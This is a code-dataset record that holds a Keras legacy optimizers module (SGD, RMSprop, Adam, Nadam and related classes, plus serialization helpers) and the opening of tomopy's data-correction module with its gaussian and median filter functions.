self.schedule_decay = schedule_decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
# Due to the recommendations in [2], i.e. warming momentum schedule
momentum_cache_t = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), t * self.schedule_decay)))
momentum_cache_t_1 = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), (t + 1) * self.schedule_decay)))
m_schedule_new = self.m_schedule * momentum_cache_t
m_schedule_next = self.m_schedule * momentum_cache_t * momentum_cache_t_1
self.updates.append((self.m_schedule, m_schedule_new))
shapes = [K.int_shape(p) for p in params]
ms = [K.zeros(shape) for shape in shapes]
vs = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations, self.m_schedule] + ms + vs
for p, g, m, v in zip(params, grads, ms, vs):
# the following equations given in [1]
g_prime = g / (1. - m_schedule_new)
m_t = self.beta_1 * m + (1. - self.beta_1) * g
m_t_prime = m_t / (1. - m_schedule_next)
v_t = self.beta_2 * v + (1. - self.beta_2) * math_ops.square(g)
v_t_prime = v_t / (1. - math_ops.pow(self.beta_2, t))
m_t_bar = (1. -
momentum_cache_t) * g_prime + momentum_cache_t_1 * m_t_prime
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
p_t = p - self.lr * m_t_bar / (K.sqrt(v_t_prime) + self.epsilon)
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'epsilon': self.epsilon,
'schedule_decay': self.schedule_decay
}
base_config = super(Nadam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class TFOptimizer(Optimizer, trackable.Trackable):
"""Wrapper class for native TensorFlow optimizers."""
def __init__(self, optimizer, iterations=None): # pylint: disable=super-init-not-called
self.optimizer = optimizer
self._track_trackable(optimizer, name='optimizer')
if iterations is None:
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
else:
self.iterations = iterations
self._track_trackable(self.iterations, name='global_step')
def apply_gradients(self, grads):
self.optimizer.apply_gradients(grads, global_step=self.iterations)
def get_grads(self, loss, params):
return self.optimizer.compute_gradients(loss, params)
def get_updates(self, loss, params):
if distribution_strategy_context.has_strategy():
self.updates = []
if not params:
# After the model vars have been created, the second call to get_updates
# is called with params as an empty list. This ensures that we call
# compute_gradients with params=None.
grads = self.optimizer.compute_gradients(loss)
else:
grads = self.optimizer.compute_gradients(loss, params)
global_step = training_util.get_global_step()
opt_update = self.optimizer.apply_gradients(grads, global_step)
else:
if not params:
self.updates = [state_ops.assign_add(self.iterations, 1)]
return self.updates
# Updates list starts out empty because the iterations variable is
# incremented in optimizer.apply_gradients()
self.updates = []
grads = self.optimizer.compute_gradients(loss, params)
opt_update = self.optimizer.apply_gradients(
grads, global_step=self.iterations)
self.updates.append(opt_update)
return self.updates
@property
def weights(self):
raise NotImplementedError
def get_config(self):
raise NotImplementedError
def from_config(self, config):
raise NotImplementedError
# Aliases.
sgd = SGD
rmsprop = RMSprop
adagrad = Adagrad
adadelta = Adadelta
adam = Adam
adamax = Adamax
nadam = Nadam
@keras_export('keras.optimizers.serialize')
def serialize(optimizer):
return serialize_keras_object(optimizer)
@keras_export('keras.optimizers.deserialize')
def deserialize(config, custom_objects=None):
"""Inverse of the `serialize` function.
Arguments:
config: Optimizer configuration dictionary.
custom_objects: Optional dictionary mapping names (strings) to custom
objects (classes and functions) to be considered during deserialization.
Returns:
A Keras Optimizer instance.
"""
from tensorflow.python.keras.mixed_precision.experimental import loss_scale_optimizer # pylint: disable=g-import-not-at-top
all_classes = {
'adadelta': adadelta_v2.Adadelta,
'adagrad': adagrad_v2.Adagrad,
'adam': adam_v2.Adam,
'adamax': adamax_v2.Adamax,
'nadam': nadam_v2.Nadam,
'rmsprop': rmsprop_v2.RMSprop,
'sgd': gradient_descent_v2.SGD,
'ftrl': ftrl.Ftrl,
'lossscaleoptimizer': loss_scale_optimizer.LossScaleOptimizer,
}
# Make deserialization case-insensitive for built-in optimizers.
if config['class_name'].lower() in all_classes:
config['class_name'] = config['class_name'].lower()
return deserialize_keras_object(
config,
module_objects=all_classes,
custom_objects=custom_objects,
printable_module_name='optimizer')
@keras_export('keras.optimizers.get')
def get(identifier):
"""Retrieves a Keras Optimizer instance.
Arguments:
identifier: Optimizer identifier, one of
- String: name of an optimizer
        - Dictionary: configuration dictionary.
        - Keras Optimizer instance (it will be returned unchanged).
        - TensorFlow Optimizer instance (it will be wrapped as a Keras
          Optimizer).
Returns:
A Keras Optimizer instance.
Raises:
ValueError: If `identifier` cannot be interpreted.
"""
if isinstance(identifier, (Optimizer, optimizer_v2.OptimizerV2)):
return identifier
# Wrap TF optimizer instances
elif isinstance(identifier, tf_optimizer_module.Optimizer):
opt = TFOptimizer(identifier)
K.track_tf_optimizer(opt)
return opt
elif isinstance(identifier, dict):
return deserialize(identifier)
elif isinstance(identifier, six.string_types):
config = {'class_name': str(identifier), 'config': {}}
return deserialize(config)
else:
raise ValueError('Could not interpret optimizer identifier:', identifier)
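# Usage sketch (added for illustration; not part of the upstream module):
#     opt = get('adam')                                  # string identifier
#     opt = get({'class_name': 'sgd', 'config': {}})     # config dictionary
#     opt = get(SGD(lr=0.01))                            # instance passes through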
| 35.519389
| 126
| 0.656069
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from six.moves import zip
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import ops
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_v2
from tensorflow.python.keras.optimizer_v2 import ftrl
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_v2
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_v2
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import optimizer as tf_optimizer_module
from tensorflow.python.training import training_util
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.util.tf_export import keras_export
class Optimizer(object):
def __init__(self, **kwargs):
allowed_kwargs = {'clipnorm', 'clipvalue'}
for k in kwargs:
if k not in allowed_kwargs:
raise TypeError('Unexpected keyword argument '
'passed to optimizer: ' + str(k))
if kwargs[k] < 0:
raise ValueError('Expected {} >= 0, received: {}'.format(k, kwargs[k]))
self.__dict__.update(kwargs)
self.updates = []
self.weights = []
def get_updates(self, loss, params):
raise NotImplementedError
def get_gradients(self, loss, params):
grads = K.gradients(loss, params)
if None in grads:
raise ValueError('An operation has `None` for gradient. '
'Please make sure that all of your ops have a '
'gradient defined (i.e. are differentiable). '
'Common ops without gradient: '
'K.argmax, K.round, K.eval.')
if hasattr(self, 'clipnorm'):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, 'clipvalue'):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
return grads
def set_weights(self, weights):
params = self.weights
if len(params) != len(weights):
raise ValueError('Length of the specified weight list (' +
str(len(weights)) +
') does not match the number of weights '
'of the optimizer (' + str(len(params)) + ')')
weight_value_tuples = []
param_values = K.batch_get_value(params)
for pv, p, w in zip(param_values, params, weights):
if pv.shape != w.shape:
raise ValueError('Optimizer weight shape ' + str(pv.shape) +
' not compatible with '
'provided weight shape ' + str(w.shape))
weight_value_tuples.append((p, w))
K.batch_set_value(weight_value_tuples)
def get_weights(self):
return K.batch_get_value(self.weights)
def get_config(self):
config = {}
if hasattr(self, 'clipnorm'):
config['clipnorm'] = self.clipnorm
if hasattr(self, 'clipvalue'):
config['clipvalue'] = self.clipvalue
return config
@classmethod
def from_config(cls, config):
return cls(**config)
class SGD(Optimizer):
def __init__(self, lr=0.01, momentum=0., decay=0., nesterov=False, **kwargs):
super(SGD, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.momentum = K.variable(momentum, name='momentum')
self.decay = K.variable(decay, name='decay')
self.initial_decay = decay
self.nesterov = nesterov
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
shapes = [K.int_shape(p) for p in params]
moments = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + moments
for p, g, m in zip(params, grads, moments):
v = self.momentum * m - lr * g
self.updates.append(state_ops.assign(m, v))
if self.nesterov:
new_p = p + self.momentum * v - lr * g
else:
new_p = p + v
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'momentum': float(K.get_value(self.momentum)),
'decay': float(K.get_value(self.decay)),
'nesterov': self.nesterov
}
base_config = super(SGD, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class RMSprop(Optimizer):
def __init__(self, lr=0.001, rho=0.9, epsilon=None, decay=0., **kwargs):
super(RMSprop, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.rho = K.variable(rho, name='rho')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
accumulators = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': float(K.get_value(self.rho)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(RMSprop, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adagrad(Optimizer):
def __init__(self, lr=0.01, epsilon=None, decay=0., **kwargs):
super(Adagrad, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
new_a = a + math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adagrad, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adadelta(Optimizer):
def __init__(self, lr=1.0, rho=0.95, epsilon=None, decay=0., **kwargs):
super(Adadelta, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.rho = rho
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
delta_accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators + delta_accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a, d_a in zip(params, grads, accumulators, delta_accumulators):
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
update = g * K.sqrt(d_a + self.epsilon) / K.sqrt(new_a + self.epsilon)
new_p = p - lr * update
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
new_d_a = self.rho * d_a + (1 - self.rho) * math_ops.square(update)
self.updates.append(state_ops.assign(d_a, new_d_a))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': self.rho,
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adadelta, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adam(Optimizer):
def __init__(self,
lr=0.001,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
amsgrad=False,
**kwargs):
super(Adam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
self.amsgrad = amsgrad
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr * (
K.sqrt(1. - math_ops.pow(self.beta_2, t)) /
(1. - math_ops.pow(self.beta_1, t)))
ms = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
vs = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
if self.amsgrad:
vhats = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
else:
vhats = [K.zeros(1) for _ in params]
self.weights = [self.iterations] + ms + vs + vhats
for p, g, m, v, vhat in zip(params, grads, ms, vs, vhats):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
v_t = (self.beta_2 * v) + (1. - self.beta_2) * math_ops.square(g)
if self.amsgrad:
vhat_t = math_ops.maximum(vhat, v_t)
p_t = p - lr_t * m_t / (K.sqrt(vhat_t) + self.epsilon)
self.updates.append(state_ops.assign(vhat, vhat_t))
else:
p_t = p - lr_t * m_t / (K.sqrt(v_t) + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
new_p = p_t
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon,
'amsgrad': self.amsgrad
}
base_config = super(Adam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adamax(Optimizer):
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
**kwargs):
super(Adamax, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * (
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr / (1. - math_ops.pow(self.beta_1, t))
shapes = [K.int_shape(p) for p in params]
ms = [K.zeros(shape) for shape in shapes]
us = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + ms + us
for p, g, m, u in zip(params, grads, ms, us):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
u_t = math_ops.maximum(self.beta_2 * u, math_ops.abs(g))
p_t = p - lr_t * m_t / (u_t + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(u, u_t))
new_p = p_t
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adamax, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Nadam(Optimizer):
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
schedule_decay=0.004,
**kwargs):
super(Nadam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.m_schedule = K.variable(1., name='m_schedule')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.schedule_decay = schedule_decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
momentum_cache_t = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), t * self.schedule_decay)))
momentum_cache_t_1 = self.beta_1 * (
1. - 0.5 *
(math_ops.pow(K.cast_to_floatx(0.96), (t + 1) * self.schedule_decay)))
m_schedule_new = self.m_schedule * momentum_cache_t
m_schedule_next = self.m_schedule * momentum_cache_t * momentum_cache_t_1
self.updates.append((self.m_schedule, m_schedule_new))
shapes = [K.int_shape(p) for p in params]
ms = [K.zeros(shape) for shape in shapes]
vs = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations, self.m_schedule] + ms + vs
for p, g, m, v in zip(params, grads, ms, vs):
g_prime = g / (1. - m_schedule_new)
m_t = self.beta_1 * m + (1. - self.beta_1) * g
m_t_prime = m_t / (1. - m_schedule_next)
v_t = self.beta_2 * v + (1. - self.beta_2) * math_ops.square(g)
v_t_prime = v_t / (1. - math_ops.pow(self.beta_2, t))
m_t_bar = (1. -
momentum_cache_t) * g_prime + momentum_cache_t_1 * m_t_prime
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
p_t = p - self.lr * m_t_bar / (K.sqrt(v_t_prime) + self.epsilon)
new_p = p_t
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'epsilon': self.epsilon,
'schedule_decay': self.schedule_decay
}
base_config = super(Nadam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class TFOptimizer(Optimizer, trackable.Trackable):
def __init__(self, optimizer, iterations=None):
self.optimizer = optimizer
self._track_trackable(optimizer, name='optimizer')
if iterations is None:
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
else:
self.iterations = iterations
self._track_trackable(self.iterations, name='global_step')
def apply_gradients(self, grads):
self.optimizer.apply_gradients(grads, global_step=self.iterations)
def get_grads(self, loss, params):
return self.optimizer.compute_gradients(loss, params)
def get_updates(self, loss, params):
if distribution_strategy_context.has_strategy():
self.updates = []
if not params:
grads = self.optimizer.compute_gradients(loss)
else:
grads = self.optimizer.compute_gradients(loss, params)
global_step = training_util.get_global_step()
opt_update = self.optimizer.apply_gradients(grads, global_step)
else:
if not params:
self.updates = [state_ops.assign_add(self.iterations, 1)]
return self.updates
self.updates = []
grads = self.optimizer.compute_gradients(loss, params)
opt_update = self.optimizer.apply_gradients(
grads, global_step=self.iterations)
self.updates.append(opt_update)
return self.updates
@property
def weights(self):
raise NotImplementedError
def get_config(self):
raise NotImplementedError
def from_config(self, config):
raise NotImplementedError
sgd = SGD
rmsprop = RMSprop
adagrad = Adagrad
adadelta = Adadelta
adam = Adam
adamax = Adamax
nadam = Nadam
@keras_export('keras.optimizers.serialize')
def serialize(optimizer):
return serialize_keras_object(optimizer)
@keras_export('keras.optimizers.deserialize')
def deserialize(config, custom_objects=None):
from tensorflow.python.keras.mixed_precision.experimental import loss_scale_optimizer
all_classes = {
'adadelta': adadelta_v2.Adadelta,
'adagrad': adagrad_v2.Adagrad,
'adam': adam_v2.Adam,
'adamax': adamax_v2.Adamax,
'nadam': nadam_v2.Nadam,
'rmsprop': rmsprop_v2.RMSprop,
'sgd': gradient_descent_v2.SGD,
'ftrl': ftrl.Ftrl,
'lossscaleoptimizer': loss_scale_optimizer.LossScaleOptimizer,
}
if config['class_name'].lower() in all_classes:
config['class_name'] = config['class_name'].lower()
return deserialize_keras_object(
config,
module_objects=all_classes,
custom_objects=custom_objects,
printable_module_name='optimizer')
@keras_export('keras.optimizers.get')
def get(identifier):
if isinstance(identifier, (Optimizer, optimizer_v2.OptimizerV2)):
return identifier
elif isinstance(identifier, tf_optimizer_module.Optimizer):
opt = TFOptimizer(identifier)
K.track_tf_optimizer(opt)
return opt
elif isinstance(identifier, dict):
return deserialize(identifier)
elif isinstance(identifier, six.string_types):
config = {'class_name': str(identifier), 'config': {}}
return deserialize(config)
else:
raise ValueError('Could not interpret optimizer identifier:', identifier)
| true
| true
|
1c3eaf2c8d84487059c56d624eb2eba5474de60c
| 26,113
|
py
|
Python
|
source/tomopy/misc/corr.py
|
WilliamJudge94/tomopy
|
301ee367d18ca6d18f2b9b18e2c531c33d4739e4
|
[
"BSD-3-Clause"
] | null | null | null |
source/tomopy/misc/corr.py
|
WilliamJudge94/tomopy
|
301ee367d18ca6d18f2b9b18e2c531c33d4739e4
|
[
"BSD-3-Clause"
] | null | null | null |
source/tomopy/misc/corr.py
|
WilliamJudge94/tomopy
|
301ee367d18ca6d18f2b9b18e2c531c33d4739e4
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# #########################################################################
# Copyright (c) 2015-2019, UChicago Argonne, LLC. All rights reserved. #
# #
# Copyright 2015-2019. UChicago Argonne, LLC. This software was produced #
# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #
# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #
# U.S. Department of Energy. The U.S. Government has rights to use, #
# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #
# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #
# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #
# modified to produce derivative works, such modified software should #
# be clearly marked, so as not to confuse it with the version available #
# from ANL. #
# #
# Additionally, redistribution and use in source and binary forms, with #
# or without modification, are permitted provided that the following #
# conditions are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of UChicago Argonne, LLC, Argonne National #
# Laboratory, ANL, the U.S. Government, nor the names of its #
# contributors may be used to endorse or promote products derived #
# from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #
# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
# #########################################################################
"""
Module for data correction and masking functions.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
from scipy.ndimage import filters
import tomopy.util.mproc as mproc
import tomopy.util.dtype as dtype
import tomopy.util.extern as extern
import logging
import warnings
import numexpr as ne
import concurrent.futures as cf
from scipy.signal import medfilt2d
logger = logging.getLogger(__name__)
__author__ = "Doga Gursoy, William Judge"
__credits__ = "Mark Rivers, Xianghui Xiao"
__copyright__ = "Copyright (c) 2015, UChicago Argonne, LLC."
__docformat__ = 'restructuredtext en'
__all__ = [
'adjust_range',
'circ_mask',
'gaussian_filter',
'median_filter',
'median_filter_cuda',
'median_filter_nonfinite',
'sobel_filter',
'remove_nan',
'remove_neg',
'remove_outlier',
'remove_outlier1d',
'remove_outlier_cuda',
'remove_ring',
'enhance_projs_aps_1id',
]
def adjust_range(arr, dmin=None, dmax=None):
"""
Change dynamic range of values in an array.
Parameters
----------
arr : ndarray
Input array.
dmin, dmax : float, optional
        Minimum and maximum values to rescale data.
Returns
-------
ndarray
Output array.
"""
if dmax is None:
dmax = np.max(arr)
if dmin is None:
dmin = np.min(arr)
if dmax < np.max(arr):
arr[arr > dmax] = dmax
if dmin > np.min(arr):
arr[arr < dmin] = dmin
return arr
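# Usage sketch (added for illustration; not part of the upstream module):
#     >>> adjust_range(np.array([-0.5, 0.2, 1.7], dtype='float32'), 0., 1.)
#     array([0. , 0.2, 1. ], dtype=float32)
# Note that the clipping is done in place on the input array.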
def gaussian_filter(arr, sigma=3, order=0, axis=0, ncore=None):
"""
Apply Gaussian filter to 3D array along specified axis.
Parameters
----------
arr : ndarray
Input array.
sigma : scalar or sequence of scalars
Standard deviation for Gaussian kernel. The standard deviations
of the Gaussian filter are given for each axis as a sequence, or
as a single number, in which case it is equal for all axes.
order : {0, 1, 2, 3} or sequence from same set, optional
Order of the filter along each axis is given as a sequence
of integers, or as a single number. An order of 0 corresponds
to convolution with a Gaussian kernel. An order of 1, 2, or 3
corresponds to convolution with the first, second or third
derivatives of a Gaussian. Higher order derivatives are not
        implemented.
axis : int, optional
        Axis along which Gaussian filtering is performed.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
3D array of same shape as input.
"""
arr = dtype.as_float32(arr)
out = np.empty_like(arr)
if ncore is None:
ncore = mproc.mp.cpu_count()
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(arr.shape[axis]):
slc[axis] = i
e.submit(filters.gaussian_filter,
arr[tuple(slc)],
sigma,
order=order,
output=out[tuple(slc)])
return out
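# Usage sketch (added for illustration; not part of the upstream module):
#     >>> stack = np.random.rand(4, 64, 64).astype('float32')
#     >>> smoothed = gaussian_filter(stack, sigma=2, order=0, axis=0)
# order=0 smooths each slice; order=1 would instead convolve with the first
# derivative of the Gaussian.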
def median_filter(arr, size=3, axis=0, ncore=None):
"""
Apply median filter to 3D array along specified axis.
Parameters
----------
arr : ndarray
Input array.
size : int, optional
The size of the filter.
axis : int, optional
Axis along which median filtering is performed.
ncore : int, optional
Number of cores that will be assigned to jobs.
Returns
-------
ndarray
Median filtered 3D array.
"""
arr = dtype.as_float32(arr)
out = np.empty_like(arr)
if ncore is None:
ncore = mproc.mp.cpu_count()
with cf.ThreadPoolExecutor(ncore) as e:
slc = [slice(None)] * arr.ndim
for i in range(arr.shape[axis]):
slc[axis] = i
e.submit(filters.median_filter,
arr[tuple(slc)],
size=(size, size),
output=out[tuple(slc)])
return out
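# Usage sketch (added for illustration; not part of the upstream module):
#     >>> stack = np.random.rand(4, 64, 64).astype('float32')
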